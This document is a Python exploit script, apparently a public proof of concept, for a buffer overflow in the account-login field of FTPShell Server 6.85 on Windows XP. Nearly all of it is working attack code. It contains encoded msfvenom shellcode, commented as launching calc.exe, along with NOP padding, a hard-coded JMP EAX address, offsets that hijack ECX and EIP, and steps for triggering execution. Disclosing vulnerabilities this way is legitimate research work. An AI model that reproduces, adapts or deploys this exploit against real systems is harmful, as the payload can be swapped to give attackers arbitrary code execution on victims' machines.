#!/usr/bin/python
# Exploit Title: FTPShell Server 6.85 - Add Account Buffer Overflow
# Date: December 2nd, 2019
# Exploit Author: boku
# Vendor Homepage: http://www.ftpshell.com/index.htm
# SOftware Link: http://www.ftpshell.com/downloadserver.htm
# Program Name: FTPShell Server (Secure Plus edition)
# Version: Version 6.85
# Tested on: Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
# Recreate:
# - Install FTPShell Server v6.85
# - open 'FTPShell Server Administrator'
# - Click button 'Manage FTP Accounts..'
# - Click button 'Configure accounts..'
# - Click button 'Add'
# - Run python script & transfer 'poc.txt' to windows box
# - Open 'poc.txt' & select-all, then copy
# - Paste poc.txt text blob into 'Login' text-box
# - Press button 'OK'; program will crash & shellcode will execute
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # red fail bullet
try:
f = open('poc.txt', 'w') # open file for write
# Instructions @ Crash:
# 1. mov ecx,[esi+7c0];
# 2. mov eax,[ecx]; lea edx, [ebp-4]; push edx;
# 3. call [eax+2c4];
# exploit leaves 708 bytes for shellcode.
#msfvenom -p windows/exec CMD='calc.exe' -a x86 --platform windows -b '\x00' -v shellcode -f python
#x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"\xbb\x4f\x79\xd7\xce\xda\xde\xd9\x74\x24\xf4"
shellcode += b"\x5a\x2b\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc"
shellcode += b"\x03\x5a\x40\x9b\x22\x32\xb6\xd9\xcd\xcb\x46"
shellcode += b"\xbe\x44\x2e\x77\xfe\x33\x3a\x27\xce\x30\x6e"
shellcode += b"\xcb\xa5\x15\x9b\x58\xcb\xb1\xac\xe9\x66\xe4"
shellcode += b"\x83\xea\xdb\xd4\x82\x68\x26\x09\x65\x51\xe9"
shellcode += b"\x5c\x64\x96\x14\xac\x34\x4f\x52\x03\xa9\xe4"
shellcode += b"\x2e\x98\x42\xb6\xbf\x98\xb7\x0e\xc1\x89\x69"
shellcode += b"\x05\x98\x09\x8b\xca\x90\x03\x93\x0f\x9c\xda"
shellcode += b"\x28\xfb\x6a\xdd\xf8\x32\x92\x72\xc5\xfb\x61"
shellcode += b"\x8a\x01\x3b\x9a\xf9\x7b\x38\x27\xfa\xbf\x43"
shellcode += b"\xf3\x8f\x5b\xe3\x70\x37\x80\x12\x54\xae\x43"
shellcode += b"\x18\x11\xa4\x0c\x3c\xa4\x69\x27\x38\x2d\x8c"
shellcode += b"\xe8\xc9\x75\xab\x2c\x92\x2e\xd2\x75\x7e\x80"
shellcode += b"\xeb\x66\x21\x7d\x4e\xec\xcf\x6a\xe3\xaf\x85"
shellcode += b"\x6d\x71\xca\xeb\x6e\x89\xd5\x5b\x07\xb8\x5e"
shellcode += b"\x34\x50\x45\xb5\x71\xae\x0f\x94\xd3\x27\xd6"
shellcode += b"\x4c\x66\x2a\xe9\xba\xa4\x53\x6a\x4f\x54\xa0"
shellcode += b"\x72\x3a\x51\xec\x34\xd6\x2b\x7d\xd1\xd8\x98"
shellcode += b"\x7e\xf0\xba\x7f\xed\x98\x12\x1a\x95\x3b\x6b"
# 3. call [eax+2c4];
# - Hexadecimal 0x2c4 = 708 decimal
junk1 = '\x90' * (708-len(shellcode))
# - The call [eax+2c4] instruction will pass execution to the address located at EAX+708
# - Setting [EAX+708] to an existing JMP EAX instruction will pass execution to our shellcode
# - 0x7c9ef4c9 jmp eax | (Execute&Read) shell32.dll; aslr&rebase: false
jmpEax = '\xc9\xf4\x9e\x7c'
# 1. mov ecx,[esi+7c0];
# - ESI = 0x0012C108
# - esi+7c0 is in our supplied buffer, on the stack, at the time of the crash.
# - Control ECX @ offset 1568 bytes
junk2 = '\x90' * (1568-len(shellcode+junk1+jmpEax))
# 2. mov eax,[ecx];
# - ECX = 0x0012B768 = PTR (located on Stack) to the beginning of our shellcode in the Heap
# - EIP 3-Byte Overwrite - '\x68\xb7\x12'
ecx = '\x68\xb7\x12' # - EIP 3-Byte Overwrite - '\x68\xb7\x12
# - The '\x00' is supplied by the program when pressing the 'OK' button
# - eax is now set to the address of our shellcode.
f.write(shellcode+junk1+jmpEax+junk2+ecx)
f.close() # close the file
print blt + 'poc.txt created successfully'
except:
print err + 'poc.txt failed to create'